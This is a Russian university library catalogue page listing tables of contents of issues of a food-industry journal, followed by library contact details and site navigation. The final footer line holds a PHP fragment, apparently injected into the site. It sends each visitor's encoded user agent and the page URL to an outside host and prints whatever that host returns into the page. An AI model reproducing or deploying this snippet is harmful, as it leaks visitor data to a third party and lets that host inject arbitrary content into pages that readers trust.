  • Термоустойчивость спор Cl. botulinum при стерилизации овощных закусочных консервов / ; Л. А. Русланова, Л. В. Михайлюта, Н. С. Коробкина, С. С. Чуприна. - с.23
  • Магомедов, Р. К. Продление сроков хранения перца сладкого / Р. К. Магомедов, F. Adamicki. - с.24-25
    Кл. слова: Перец сладкий - хранение
  • Минаева, Е. В. Проблемы активизации государственной политики протекционизма отечественных товаропроизводителей зерна / Е. В. Минаева. - с.26-27
  • рябова, Т. Ф. Воздействие рисков хозяйственно-экономической деятельности на эффективность предприятий / Т. Ф. рябова, Моурик С. В. Ван. - с.28-29
    Кл. слова: Теория риска
  • Болдычева, А. Г. Определение стратегии экономического развития предприятия / А. Г. Болдычева, Т. М. Панченко. - с.3032
    Кл. слова: СТРАТЕГИЯ ПРЕДПРИЯТИЯ
  • Карданова, Л. И. Мониторинг потребительских предпочтений как элемент стратегического планирования / Л. И. Карданова, М. С. Боборенко. - с.34-36, ПРОДУКТЫ МОЛОЧНЫЕ - маркетинг
  • Магомедов, М. Д. Рынок мясных полуфабрикатов и проблемы его развития / М. Д. Магомедов, О. В. Милюкова. - с.37
    Кл. слова: Рынок полуфабрикатов мясных, ПОЛУФАБРИКАТЫ мясные
  • Бегучев, Н. И. Проблемы налогообложения малых предприятий / Н. И. Бегучев, С. В. Горин, С. Э. Курбанов. - с.38-40
    Кл. слова: ПРЕДПРИЯТИЕ МАЛОЕ - налоги, НАЛОГООБЛОЖЕНИЕ ПРЕДПРИЯТИЯ
  • Сервер промышленных приложений Wonderware Production Engine. - с.41-44
  • Климова, Д. В. Информационные системы управления на предприятиях АПК / Д. В. Климова. - с.46
    Кл. слова: АПК - информатизация
  • Крутикова, Е. О специальных защитных, антидемпинговых и компенсационных мерах при импорте товаров / Е. Крутикова, Ю. Боровикова. - с.47-49
  • Тужилкин, В. И. Предлагаем программы профессиональной переподготовки / В. И. Тужилкин, В. С. Сергунов. - с.50-52
  • Голубев, С. А. Метод начала "с нуля" в форме бюджетирования / С. А. Голубев, Е. В. Козин, Т. А. Козина. - с.53-55
  • Жапаров, К. Ж. Продовольственная безопасность Республики Казахстан / К. Ж. Жапаров, В. К. Чашин. - с.56-57
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Нечаев, А. П. Союз производителей пищевых ингредиентов / А. П. Нечаев. - с.58-59
  • Тулякова, Т. В. Дрожжевые экстракты - безопасные источники витаминов, минеральных веществ и аминокислот / Т. В. Тулякова, А. В. Пасхин, В. Ю. Седов. - с.60-62
    Кл. слова: ЭКСТРАКТ дрожжевой
  • Каргопольцев, В. П. Защита электродвигателей промышленного назначения / В. П. Каргопольцев. - с.63
  • Щеглов, А. Ю. Новинки "МОЛМАША" / А. Ю. Щеглов, В. П. Карцев. - с.64
  • Бегларян, А. Р. Влияние магнитного поля на антогонистические свойства молочнокислых и бифидобактерий / А. Р. Бегларян, Р. А. Баклачян, Н. Р. Бегларян. - с.66
  • Совершенствование теплоустановок / ; Л. Л. Товажнянский, П. А. Капустенко, С. И. Бухкало, Г. Л. Халвин, А. В. Демирский. - с.68
  • Тулик, Ю. И. Экономичная система расходования водяного пара / Ю. И. Тулик. - с.69
  • Сухих, Т. Н. Новое время - новые кондитерские изделия / Т. Н. Сухих. - с.84
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Бекалюк, А. Е. "Вторую жизнь" безалкогольным напиткам / А. Е. Бекалюк. - с.86
  • Нарушин, В. Г. Бета-каротин из плесени / В. Г. Нарушин. - с.87
  • Самофалова, Л. А. Эмульсии растительного молока для производства мороженого / Л. А. Самофалова, А. П. Симоненкова. - с.88-89
  • Мендельсон, Г. И. Значение соевых белковых продуктов в питании человека / Г. И. Мендельсон. - с.90-91
    Кл. слова: СОЯ - питание
  • Филлипова, Л. Ю. Продукты питания лечебно-профилактического назначения для детей / Л. Ю. Филлипова, Л. П. Сергеева. - с.92
    Кл. слова: ПИТАНИЕ ДЕТЕЙ лечебное
  • Шатнюк, Л. Н. Обогащение микронутриентами пищевых концентратов на зерновой основе / Л. Н. Шатнюк, А. В. Юдина. - с.94-97
  • Комбинированные продукты питания функционального назначения с белково-жировыми композитами / ; Е. И. Титов, С. К. Апраксина, Л. Ф. Митасева. - с.98-99
  • Пилат, Т. Л. Производственные группы БАД / Т. Л. Пилат. - с.100-101
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
Держатели документа (Информация об экземплярах) 
15. 
Пищевая промышленность. - Журнал, 2004г. № 2
Оглавление 
  • Бойко, А. Г. Индустрия упаковки / А. Г. Бойко. - с.10-11
    Кл. слова: УПАКОВКА ПРОДУКЦИИ
  • Олсматс, К. Тенденции мировой экономики и их влияние на индустрию упаковки / К. Олсматс. - с.12
    Кл. слова: УПАКОВКА ПРОДУКЦИИ
  • Яновский, А. М. Упаковка продукции - элемент имиджа товара / А. М. Яновский. - с.13
    Кл. слова: УПАКОВКА ПРОДУКЦИИ
  • Татьянченко, А. П. Производство гибкой упаковки / А. П. Татьянченко. - с.14-16
  • Смирнова, С. Гибкая упаковка в пищевой промышленности / С. Смирнова. - с.18
  • Кузнецов, Д. Рынок полиэтиленовых пакетов в 2004 г. / Д. Кузнецов. - с.20-22
  • Драчева, Д. В. Экологический аспект упаковки / Д. В. Драчева. - с.24-25
  • Тарасов, В. Биоразлагаемая упаковка: успехи, тенденции, перспективы / В. Тарасов. - с.26-27
  • Петрова, Е. В. Влияние упаковки на сохранность макаронных изделий / Е. В. Петрова, А. Ю. Грошев. - с.28-31
  • Кайшев, В. Г. Пятилетие роста: пищевая и перерабатывающая промышленность в 1999-2003 гг. / В. Г. Кайшев. - с.32-41
  • Минаева, Е. В. Создание социально ориентированной экономики России / Е. В. Минаева. - с.42-43
  • Пастуев, А. Л. Продовольственная безопасность региона: теоретико-метологический подход / А. Л. Пастуев, К. Ж. Жапаров, Р. Р. Равепов. - с.44-45
  • Комбинированные изделия. - с.48-49
  • Тишаев, М. В. Отечественные пластмассовые трубы для транспортировки сыпучих материалов / М. В. Тишаев, Т. П. Турчанинова, А. А. Либкин. - с.52-53
  • Мандреа, А. Г. Производство нативной пшеничной клейковины на спиртовых предприятиях / А. Г. Мандреа. - с.54-55
  • Косован, А. П. Склады хранения сыпучих видов сырья и материалов на новой элементной базе ГОСНИИХП / А. П. Косован, Т. П. Турчанинова, А. А. Либкин. - с.56-58
  • Миксер в непрерывной производственной линии. - с.60
  • Гореньков, Э. С. О научном обеспечении плодоовощной консервной промышленности / Э. С. Гореньков. - с.64-67
    Кл. слова: ПРОМЫШЛЕННОСТЬ КОНСЕРВНАЯ, Промышленность плодоовощная
  • Мегердичев, Е. Я. К вопросу восстановления сырьевой базы консервной промышленности / Е. Я. Мегердичев. - с.68-69
  • Новая продукция Торгового дома "Протеин, Технологии, Ингредиенты". - с.72-73
  • Толкунова, Н. Н. Экстракт фукуса - новое решение проблемы йодной недостаточности / Н. Н. Толкунова, А. Я. Бидюк, С. Л. Свергуненко. - с.74
  • Темираев, Р. Б. Повышение пищевой и биологической ценности мяса бройлеров / Р. Б. Темираев, С. С. Лохова. - с.76-77
  • Зайцева, Е. В. Здравствуй, соя! / Е. В. Зайцева. - с.78-79
  • Шичков, Н. А. Обеспечение безопасности пищевой продукции на основе принципов НАССР / Н. А. Шичков, Е. М. Михеева. - с.80-81
  • Кудряшева, А. А. "Ноу-хау" жизни планеты Земля (биокорректоры) / А. А. Кудряшева, Е. И. Лебедев, В. Г. Фесюн. - с.82-83
  • Продукты функционального питания и экструзия / ; Г. О. Магомедов, А. Ф. Брехов, Л. Н. Шатнюк, Е. Г. Окулич-Казарин. - с.84-87
  • Сулимина, О. Г. Российский пищевой рынок / О. Г. Сулимина. - с.102-103
  • Драчева, Л. В. Современный мир биотехнологии / Л. В. Драчева. - с.105
Держатели документа (Информация об экземплярах) 
16. 
Михайлова М. С. Товароведение вкусовых товаров для официантов, барменов [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / М. С. Михайлова, 2002. - 255 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2992 - 19.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.65 с.38 запросов, 1.27c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;